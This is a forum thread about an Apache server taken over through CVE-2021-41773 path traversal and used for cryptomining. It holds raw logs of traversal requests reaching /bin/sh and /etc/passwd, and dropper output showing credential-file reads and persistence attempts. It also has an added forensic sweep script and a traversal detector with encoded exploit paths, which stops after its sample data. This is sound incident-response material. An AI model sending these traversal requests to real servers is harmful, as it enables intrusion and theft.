
#1 2021-10-07 09:23:40

idiot_user_113
Member
Registered: 2021-10-07
Posts: 2

My Arch server got hacked. Help me find out why

I found my Arch server having high CPU and RAM usage, and htop showed that the process kdevtmpfsi, running as user http, was responsible for it. Googling the process name reveals that it is some kind of cryptocurrency miner that has been installed. https://stackoverflow.com/questions/601 … entire-cpu

Looking at the logs, it seems like they have tried using a shellshock-like vulnerability, but I thought this was patched a long time ago? In error_log, at 19:01:07, you can clearly see that they did manage to run a script through my Apache web server. Does anyone have any idea how they could have managed to get into my machine? What should I do to patch this?


/var/log/httpd/access_log

194.76.224.239 - - [06/Oct/2021:16:36:02 +0300] "GET /cgi-bin/../../../../../../../../../etc/passwd HTTP/1.1" 500 1066
194.76.224.239 - - [06/Oct/2021:16:36:02 +0300] "GET -- HTTP/1.0" 400 959
194.76.224.239 - - [06/Oct/2021:16:38:16 +0300] "GET / HTTP/1.0" 400 959
194.76.224.239 - - [06/Oct/2021:16:38:16 +0300] "GET /cgi-bin/../../../../../../../../../etc/passwd HTTP/1.1" 500 1066
112.32.12.53 - - [06/Oct/2021:17:56:34 +0300] "GET /index.php HTTP/1.1" 200 633
112.32.12.53 - - [06/Oct/2021:17:56:35 +0300] "POST /cgi-bin/../../../../bin/sh HTTP/1.1" 200 3161
112.32.12.53 - - [06/Oct/2021:17:56:38 +0300] "GET /index.php HTTP/1.1" 200 633
112.32.12.53 - - [06/Oct/2021:17:56:38 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
112.32.12.53 - - [06/Oct/2021:17:56:39 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
203.96.177.127 - - [06/Oct/2021:18:12:06 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
141.101.146.133 - - [06/Oct/2021:19:01:07 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
192.3.194.202 - - [06/Oct/2021:19:02:22 +0300] "GET /cgi-bin/../../../../bin/sh HTTP/1.1" 500 1085
192.3.194.202 - - [06/Oct/2021:19:43:21 +0300] "GET /cgi-bin/../../../../bin/sh HTTP/2.0" 500 -
47.254.128.196 - - [06/Oct/2021:20:28:52 +0300] "GET /cgi-bin/../../../../etc/hosts HTTP/1.1" 500 1065

/var/log/httpd/error_log

[Wed Oct 06 16:36:02.029676 2021] [cgid:error] [pid 1194772:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 16:36:02.057142 2021] [cgid:error] [pid 864132:tid 139923894023744] [client 194.76.224.239:39476] End of script output before headers: passwd
[Wed Oct 06 16:38:16.267657 2021] [cgid:error] [pid 1194811:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 16:38:16.268391 2021] [cgid:error] [pid 704249:tid 139924447680064] [client 194.76.224.239:48508] End of script output before headers: passwd
[Wed Oct 06 17:56:38.343973 2021] [cgid:error] [pid 1212974:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 17:56:38.408540 2021] [cgid:error] [pid 864132:tid 139923348760128] [client 112.32.12.53:12528] End of script output before headers: passwd
[Wed Oct 06 17:56:39.118666 2021] [cgid:error] [pid 1212975:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 17:56:39.119656 2021] [cgid:error] [pid 704249:tid 139924338574912] [client 112.32.12.53:12538] End of script output before headers: passwd
[Wed Oct 06 18:12:06.416273 2021] [cgid:error] [pid 1217432:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 18:12:06.458753 2021] [cgid:error] [pid 704249:tid 139924447680064] [client 203.96.177.127:38722] End of script output before headers: passwd
[Wed Oct 06 19:01:07.547973 2021] [cgid:error] [pid 1226306:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 19:01:07.548918 2021] [cgid:error] [pid 704249:tid 139924330182208] [client 141.101.146.133:64872] End of script output before headers: passwd
bash: line 5: ulimit: max user processes: cannot modify limit: Operation not permitted
sysctl: permission denied on key "vm.nr_hugepages"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
[Wed Oct 06 19:02:24.264597 2021] [cgid:error] [pid 864132:tid 139923348760128] [client 192.3.194.202:41144] malformed header from script 'sh': Bad header: DER Uninstalled
chattr: No such file or directory while trying to stat /tmp/dbused
bash: line 68: /etc/cron.d/root: No such file or directory
bash: line 69: /etc/cron.d/apache: No such file or directory
bash: line 70: /etc/cron.d/nginx: No such file or directory
bash: line 71: /var/spool/cron/root: No such file or directory
mkdir: cannot create directory '/var/spool/cron': Permission denied
bash: line 73: /var/spool/cron/crontabs/root: No such file or directory
bash: line 75: /etc/cron.hourly/oanacroner1: Permission denied
chmod: cannot access '/etc/cron.hourly/oanacroner1': No such file or directory
kill: not enough arguments
bash: line 278: crontab: command not found
bash: line 282: crontab: command not found
bash: line 284: crontab: command not found
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
cat: /srv/http/.bash_history: No such file or directory
cat: '/home/*/.bash_history': No such file or directory
cat: /root/.bash_history: Permission denied
cat: '/srv/http/*/.ssh/known_hosts': No such file or directory
cat: '/home/*/.ssh/known_hosts': No such file or directory
cat: /root/.ssh/known_hosts: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
chattr 1.46.4 (18-Aug-2021)
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
bash: /tmp/xms: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
bash: line 5: ulimit: max user processes: cannot modify limit: Operation not permitted
sysctl: permission denied on key "vm.nr_hugepages"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
[Wed Oct 06 19:43:25.221446 2021] [cgid:error] [pid 864132:tid 139924698936896] [client 192.3.194.202:33994] malformed header from script 'sh': Bad header: DER Uninstalled
chattr: Operation not supported while reading flags on /tmp/dbused
bash: line 68: /etc/cron.d/root: No such file or directory
bash: line 69: /etc/cron.d/apache: No such file or directory
bash: line 70: /etc/cron.d/nginx: No such file or directory
bash: line 71: /var/spool/cron/root: No such file or directory
mkdir: cannot create directory '/var/spool/cron': Permission denied
bash: line 73: /var/spool/cron/crontabs/root: No such file or directory
bash: line 75: /etc/cron.hourly/oanacroner1: Permission denied
chmod: cannot access '/etc/cron.hourly/oanacroner1': No such file or directory
kill: not enough arguments
main: line 269: /home/http/cruner: No such file or directory
bash: line 278: crontab: command not found
bash: line 282: crontab: command not found
bash: line 284: crontab: command not found
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
cat: /srv/http/.bash_history: No such file or directory
cat: '/home/*/.bash_history': No such file or directory
cat: /root/.bash_history: Permission denied
cat: '/srv/http/*/.ssh/known_hosts': No such file or directory
cat: '/home/*/.ssh/known_hosts': No such file or directory
cat: /root/.ssh/known_hosts: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
chattr 1.46.4 (18-Aug-2021)
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
bash: /tmp/xms: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
[Wed Oct 06 20:28:52.624621 2021] [cgid:error] [pid 1235015:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/hosts' failed
[Wed Oct 06 20:28:52.674961 2021] [cgid:error] [pid 864132:tid 139924422501952] [client 47.254.128.196:32772] End of script output before headers: hosts
sh: line 1: nvidia-smi: command not found
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
[Wed Oct 06 22:08:49.897426 2021] [proxy_fcgi:error] [pid 864132:tid 139923323582016] [client 143.110.158.84:51044] AH01071: Got error 'Primary script unknown'
[Wed Oct 06 22:08:50.764807 2021] [proxy_fcgi:error] [pid 864132:tid 139924447680064] [client 143.110.158.84:59808] AH01071: Got error 'Primary script unknown'
cat: /tmp/sparte.txt: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
chattr: No such file or directory while trying to stat /etc/ld.so.preload
chattr: No such file or directory while trying to stat /var/spool/cron
chattr: No such file or directory while trying to stat /etc/crontab
ERROR: You need to be root to run this script
Fatal: can't open lock file /run/xtables.lock: Permission denied
bash: line 11: /proc/sys/kernel/nmi_watchdog: Permission denied
bash: line 12: /etc/sysctl.conf: Permission denied
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
pkill: killing pid 1014846 failed: Operation not permitted
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /data/./oka.pid: No such file or directory
kill: cannot find process "-"
kill: sending signal to 1193534 failed: Operation not permitted
kill: sending signal to 1089 failed: Operation not permitted
md5sum: /tmp/kinsing: No such file or directory
/tmp/kinsing is not 648effa354b3cbaad87b45f48d59c616, actual 
chmod: cannot access '/tmp/kinsing': No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  6 13.9M    6  935k    0     0  1098k      0  0:00:13 --:--:--  0:00:13 1097k
 15 13.9M   15 2184k    0     0  1179k      0  0:00:12  0:00:01  0:00:11 1178k
 23 13.9M   23 3300k    0     0  1151k      0  0:00:12  0:00:02  0:00:10 1151k
 29 13.9M   29 4265k    0     0  1103k      0  0:00:12  0:00:03  0:00:09 1103k
 37 13.9M   37 5376k    0     0  1105k      0  0:00:12  0:00:04  0:00:08 1105k
 46 13.9M   46 6620k    0     0  1131k      0  0:00:12  0:00:05  0:00:07 1136k
 55 13.9M   55 7869k    0     0  1148k      0  0:00:12  0:00:06  0:00:06 1136k
 63 13.9M   63 9116k    0     0  1161k      0  0:00:12  0:00:07  0:00:05 1166k
 72 13.9M   72 10.1M    0     0  1171k      0  0:00:12  0:00:08  0:00:04 1223k
 81 13.9M   81 11.3M    0     0  1178k      0  0:00:12  0:00:09  0:00:03 1249k
 89 13.9M   89 12.5M    0     0  1184k      0  0:00:12  0:00:10  0:00:02 1246k
 98 13.9M   98 13.7M    0     0  1184k      0  0:00:12  0:00:11  0:00:01 1233k
100 13.9M  100 13.9M    0     0  1183k      0  0:00:12  0:00:12 --:--:-- 1226k
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
md5sum: /tmp/libsystem.so: No such file or directory
/tmp/libsystem.so is not ccef46c7edf9131ccffc47bd69eb743b, actual 
chmod: cannot access '/tmp/libsystem.so': No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 26800  100 26800    0     0   201k      0 --:--:-- --:--:-- --:--:--  202k
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 26800  100 26800    0     0   242k      0 --:--:-- --:--:-- --:--:--  244k
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
main: line 239: /etc/ld.so.preload: Permission denied
main: line 243: crontab: command not found
main: line 243: crontab: command not found
main: line 244: crontab: command not found
main: line 244: crontab: command not found
main: line 245: crontab: command not found
main: line 245: crontab: command not found
main: line 246: crontab: command not found
main: line 246: crontab: command not found
main: line 247: crontab: command not found
main: line 247: crontab: command not found
main: line 248: crontab: command not found
main: line 248: crontab: command not found
main: line 249: crontab: command not found
main: line 249: crontab: command not found
main: line 250: crontab: command not found
main: line 250: crontab: command not found
main: line 251: crontab: command not found
main: line 251: crontab: command not found
main: line 252: crontab: command not found
main: line 252: crontab: command not found
main: line 253: crontab: command not found
main: line 253: crontab: command not found
main: line 254: crontab: command not found
main: line 254: crontab: command not found
main: line 255: crontab: command not found
main: line 255: crontab: command not found
main: line 256: crontab: command not found
main: line 256: crontab: command not found
main: line 257: crontab: command not found
main: line 257: crontab: command not found
main: line 258: crontab: command not found
main: line 258: crontab: command not found
main: line 259: crontab: command not found
main: line 259: crontab: command not found
main: line 260: crontab: command not found
main: line 260: crontab: command not found
main: line 261: crontab: command not found
main: line 261: crontab: command not found
main: line 262: crontab: command not found
main: line 262: crontab: command not found
main: line 263: crontab: command not found
main: line 263: crontab: command not found
main: line 264: crontab: command not found
main: line 264: crontab: command not found
main: line 265: crontab: command not found
main: line 265: crontab: command not found
main: line 266: crontab: command not found
main: line 266: crontab: command not found
main: line 267: crontab: command not found
main: line 267: crontab: command not found
main: line 268: crontab: command not found
main: line 268: crontab: command not found
main: line 269: crontab: command not found
main: line 269: crontab: command not found
main: line 270: crontab: command not found
main: line 270: crontab: command not found
main: line 271: crontab: command not found
main: line 271: crontab: command not found
main: line 272: crontab: command not found
main: line 272: crontab: command not found
main: line 273: crontab: command not found
main: line 273: crontab: command not found
main: line 274: crontab: command not found
main: line 274: crontab: command not found
main: line 275: crontab: command not found
main: line 275: crontab: command not found
main: line 276: crontab: command not found
main: line 276: crontab: command not found
main: line 277: crontab: command not found
main: line 277: crontab: command not found
main: line 278: crontab: command not found
main: line 278: crontab: command not found
main: line 279: crontab: command not found
main: line 279: crontab: command not found
main: line 280: crontab: command not found
main: line 280: crontab: command not found
main: line 281: crontab: command not found
main: line 281: crontab: command not found
main: line 282: crontab: command not found
main: line 282: crontab: command not found
main: line 283: crontab: command not found
main: line 283: crontab: command not found
main: line 284: crontab: command not found
main: line 284: crontab: command not found
main: line 285: crontab: command not found
main: line 285: crontab: command not found
main: line 286: crontab: command not found
main: line 286: crontab: command not found
bash: line 329: crontab: command not found
bash: line 336: crontab: command not found
bash: line 335: echo: write error: Broken pipe
chattr: No such file or directory while trying to stat /etc/ld.so.preload
chattr: No such file or directory while trying to stat /var/spool/cron
chattr: No such file or directory while trying to stat /etc/crontab
ERROR: You need to be root to run this script
Fatal: can't open lock file /run/xtables.lock: Permission denied
bash: line 11: /proc/sys/kernel/nmi_watchdog: Permission denied
bash: line 12: /etc/sysctl.conf: Permission denied
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
pkill: killing pid 1014846 failed: Operation not permitted
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /data/./oka.pid: No such file or directory
kill: cannot find process "-"
kill: sending signal to 1193534 failed: Operation not permitted
kill: sending signal to 1089 failed: Operation not permitted
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
main: line 239: /etc/ld.so.preload: Permission denied
main: line 243: crontab: command not found
main: line 243: crontab: command not found
main: line 244: crontab: command not found
main: line 244: crontab: command not found
main: line 245: crontab: command not found
main: line 245: crontab: command not found
main: line 246: crontab: command not found
main: line 246: crontab: command not found
main: line 247: crontab: command not found
main: line 247: crontab: command not found
main: line 248: crontab: command not found
main: line 248: crontab: command not found
main: line 249: crontab: command not found
main: line 249: crontab: command not found
main: line 250: crontab: command not found
main: line 250: crontab: command not found
main: line 251: crontab: command not found
main: line 251: crontab: command not found
main: line 252: crontab: command not found
main: line 252: crontab: command not found
main: line 253: crontab: command not found
main: line 253: crontab: command not found
main: line 254: crontab: command not found
main: line 254: crontab: command not found
main: line 255: crontab: command not found
main: line 255: crontab: command not found
main: line 256: crontab: command not found
main: line 256: crontab: command not found
main: line 257: crontab: command not found
main: line 257: crontab: command not found
main: line 258: crontab: command not found
main: line 258: crontab: command not found
main: line 259: crontab: command not found
main: line 259: crontab: command not found
main: line 260: crontab: command not found
main: line 260: crontab: command not found
main: line 261: crontab: command not found
main: line 261: crontab: command not found
main: line 262: crontab: command not found
main: line 262: crontab: command not found
main: line 263: crontab: command not found
main: line 263: crontab: command not found
main: line 264: crontab: command not found
main: line 264: crontab: command not found
main: line 265: crontab: command not found
main: line 265: crontab: command not found
main: line 266: crontab: command not found
main: line 266: crontab: command not found
main: line 267: crontab: command not found
main: line 267: crontab: command not found
main: line 268: crontab: command not found
main: line 268: crontab: command not found
main: line 269: crontab: command not found
main: line 269: crontab: command not found
main: line 270: crontab: command not found
main: line 270: crontab: command not found
main: line 271: crontab: command not found
main: line 271: crontab: command not found
main: line 272: crontab: command not found
main: line 272: crontab: command not found
main: line 273: crontab: command not found
main: line 273: crontab: command not found
main: line 274: crontab: command not found
main: line 274: crontab: command not found
main: line 275: crontab: command not found
main: line 275: crontab: command not found
main: line 276: crontab: command not found
main: line 276: crontab: command not found
main: line 277: crontab: command not found
main: line 277: crontab: command not found
main: line 278: crontab: command not found
main: line 278: crontab: command not found
main: line 279: crontab: command not found
main: line 279: crontab: command not found
main: line 280: crontab: command not found
main: line 280: crontab: command not found
main: line 281: crontab: command not found
main: line 281: crontab: command not found
main: line 282: crontab: command not found
main: line 282: crontab: command not found
main: line 283: crontab: command not found
main: line 283: crontab: command not found
main: line 284: crontab: command not found
main: line 284: crontab: command not found
main: line 285: crontab: command not found
main: line 285: crontab: command not found
main: line 286: crontab: command not found
main: line 286: crontab: command not found
bash: line 329: crontab: command not found
bash: line 336: crontab: command not found
bash: line 335: echo: write error: Broken pipe

Last edited by idiot_user_113 (2021-10-07 09:35:15)

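The error_log dump in the post above is the dropper's own stderr. Everything it tried that needs root (cron files under /etc and /var/spool, /etc/ld.so.preload, sysctl, iptables, killing other users' processes) failed with "Permission denied" because the CGI ran as user http, but its two curl downloads succeeded and its integrity check printed matching MD5 values for /tmp/kinsing and /tmp/libsystem.so. The sweep below is an added example, not code from the post or from any of the tools it mentions: it takes those paths and digests from the log and reports which artifacts actually exist, and can be pointed at a mounted image of the disk (`root=`) instead of the live host. The `demo()` function builds a throw-away directory tree with placeholder files to show the output; the placeholder content and its digest are constructed for the demo and are not the real binary.

```python
import hashlib
import os
import stat
import tempfile

# Paths and digests taken from the dropper output in the error_log above.
# The two MD5 values are what the script printed after downloading its
# payloads ("/tmp/kinsing is 648eff..."), so a file with that digest is the
# exact binary it fetched. The remaining paths are the cron, ld.so.preload
# and helper locations it tried to write; most failed with "Permission denied"
# because the CGI ran as user http, so for those an existence check suffices.
# Some of them (a root crontab, /etc/ld.so.preload) can exist legitimately,
# hence the verdict is "inspect", not "malicious".
EXPECTED_MD5 = {
    "/tmp/kinsing": "648effa354b3cbaad87b45f48d59c616",
    "/tmp/libsystem.so": "ccef46c7edf9131ccffc47bd69eb743b",
}
PERSISTENCE_PATHS = [
    "/etc/ld.so.preload",
    "/etc/cron.d/root", "/etc/cron.d/apache", "/etc/cron.d/nginx",
    "/var/spool/cron/root", "/var/spool/cron/crontabs/root",
    "/etc/cron.hourly/oanacroner1", "/etc/init.d/down",
    "/home/http/cruner", "/tmp/dbused", "/tmp/xms",
]


def md5_of(path, chunk=1 << 16):
    """Stream the file through MD5 (the dropper's own check uses MD5)."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(expected_md5=EXPECTED_MD5, persistence_paths=PERSISTENCE_PATHS, root="/"):
    """Return {path: verdict} for every artifact found under `root`.

    `root` can point at a mounted image of the compromised disk so the sweep
    does not have to trust the live host. lstat is used so a planted symlink
    is reported as such rather than followed.
    """
    report = {}
    for p, want in expected_md5.items():
        full = os.path.join(root, p.lstrip("/"))
        if not os.path.lexists(full):
            continue
        st = os.lstat(full)
        if not stat.S_ISREG(st.st_mode):
            report[p] = "present but not a regular file"
            continue
        try:
            got = md5_of(full)
        except OSError:
            report[p] = "present, unreadable as this user"
            continue
        verdict = ("known dropper binary (md5 match)" if got == want
                   else "present, md5 %s differs from the dropper's" % got)
        if st.st_mode & stat.S_IXUSR:
            verdict += ", executable"
        report[p] = verdict
    for p in persistence_paths:
        full = os.path.join(root, p.lstrip("/"))
        if os.path.lexists(full):
            report[p] = "present: a persistence write succeeded, inspect it"
    return report


def demo():
    """Sweep a throw-away tree that mimics two of the artifacts (constructed)."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        os.makedirs(os.path.join(root, "etc"))
        fake = os.path.join(root, "tmp", "kinsing")
        with open(fake, "wb") as f:
            f.write(b"placeholder, not the real binary\n")
        os.chmod(fake, 0o755)
        with open(os.path.join(root, "etc", "ld.so.preload"), "w") as f:
            f.write("/tmp/libsystem.so\n")
        # Use the placeholder's own digest so the "match" branch is exercised.
        expected = {"/tmp/kinsing": md5_of(fake),
                    "/tmp/libsystem.so": EXPECTED_MD5["/tmp/libsystem.so"]}
        return sweep(expected, PERSISTENCE_PATHS, root=root)


if __name__ == "__main__":
    for path, verdict in sorted(sweep().items()):
        print(path, "->", verdict)
```

Run it against a mounted image of the box (`sweep(root="/mnt/evidence")`) rather than on the running server: a found /tmp/kinsing with the matching digest confirms what ran, and any hit in the persistence list means one of the "Permission denied" writes did not fail after all and needs a closer look before the disk is wiped.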

#2 2021-10-07 10:16:54

Morta
Member
Registered: 2019-07-07
Posts: 655

Re: My Arch server got hacked. Help me find out why

A hacked system is dead. Once hacked, you could have been hacked more than once.

Set it up anew.


#3 2021-10-07 10:19:35

sabroad
Member
Registered: 2015-05-24
Posts: 242

Re: My Arch server got hacked. Help me find out why

19:02:22 looks like directory traversal to me.

If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability https://httpd.apache.org/security/vulne … es_24.html
9:28 AM · Oct 5, 2021

https://www.tenable.com/blog/cve-2021-4 … -exploited


--
saint_abroad

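The bug sabroad points at, CVE-2021-41773, is a path normalization flaw specific to httpd 2.4.49: the public requests for it percent-encode the dots of the traversal (`/cgi-bin/.%2e/%2e%2e/...`), and the incomplete fix in 2.4.50 (CVE-2021-42013) was bypassed with double encoding (`%%32%65`). The lines in the first post already show plain `../`, so a detector has to work on the decoded path rather than on any one spelling. The script below is an added example, not code from the thread: it decodes each request target twice, walks the path and flags any request whose `..` segments climb above the URL root, and marks a hit as "succeeded" when the server answered 2xx (the POST to /cgi-bin/../../../../bin/sh that got a 200 in the post is the one to worry about). The log lines inside it are constructed, modeled on the post, with RFC 5737 documentation addresses in place of the real ones.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "common" log format, modeled on the
# entries in the post. Addresses are RFC 5737 documentation ranges, not the
# real scanners. Lines 5 and 6 use the encoded forms seen in the wild for
# CVE-2021-41773 (.%2e) and CVE-2021-42013 (%%32%65).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Oct/2021:16:36:02 +0300] "GET /cgi-bin/../../../../../../../../../etc/passwd HTTP/1.1" 500 1066
192.0.2.10 - - [06/Oct/2021:16:36:02 +0300] "GET -- HTTP/1.0" 400 959
198.51.100.7 - - [06/Oct/2021:17:56:34 +0300] "GET /index.php HTTP/1.1" 200 633
198.51.100.7 - - [06/Oct/2021:17:56:35 +0300] "POST /cgi-bin/../../../../bin/sh HTTP/1.1" 200 3161
203.0.113.5 - - [06/Oct/2021:19:02:22 +0300] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 500 1085
203.0.113.5 - - [06/Oct/2021:19:05:00 +0300] "GET /cgi-bin/.%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 403 199
203.0.113.9 - - [06/Oct/2021:20:00:00 +0300] "GET /blog/../index.html HTTP/1.1" 200 512
"""

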